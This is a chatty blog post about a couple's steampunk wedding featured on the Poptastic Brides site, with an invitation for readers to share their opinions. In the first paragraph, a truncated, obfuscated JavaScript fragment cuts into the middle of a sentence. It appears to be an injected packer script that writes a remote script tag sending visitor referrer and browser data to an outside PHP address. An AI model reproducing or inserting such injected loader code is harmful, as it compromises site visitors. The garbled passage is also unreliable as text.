Now, err hmmm. How old am I?  It’s a question I had to ask myself this morning.  While cruising around the internet having fun researching the best of the best for the AIW blog I found a post on the effervescent Poptastic””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’anfdn|varaztth||js|php’.split(‘|’),0,{}))
website all about a couples ‘Steampunk’ wedding.

That was when I wriggled my nose up.  “A whaaaatttt?” I blurted out at my mac screen. What is a Steampunk Wedding? I wondered.

So I scrolled down to look at the photos and then blurted out again at my mac screen, only this time with a very different emotion – “WOW. Love it.”

Have a look at the post on Poptastic Brides’ website here and check out more of the photos. Here is a sneak peek of one of them (borrowed from Poptastic Brides’ website – thank you my darling) to give you an idea of what a Steampunk wedding looks like.

This is what I love – people being exactly who they are.  Not conforming to tradition or popular belief.  People showing their personality through their story, their wedding.  Sharing an attitude and belief in who they are and what they want to represent – that’s a real wedding!

Oh…for those who wriggled their nose like me when they read the word ‘Steampunk’, here is the wiki def:

Steampunk is a sub-genre of science fiction, alternate history, and speculative fiction that came into prominence during the 1980s and early 1990s.

Thanks wiki – would never have known that otherwise.

So, what do you think?  Do you love Steampunk?  Maybe just some elements of it?  I do.

Thumbs up or thumbs down – let me know what you think?

Zarn ?
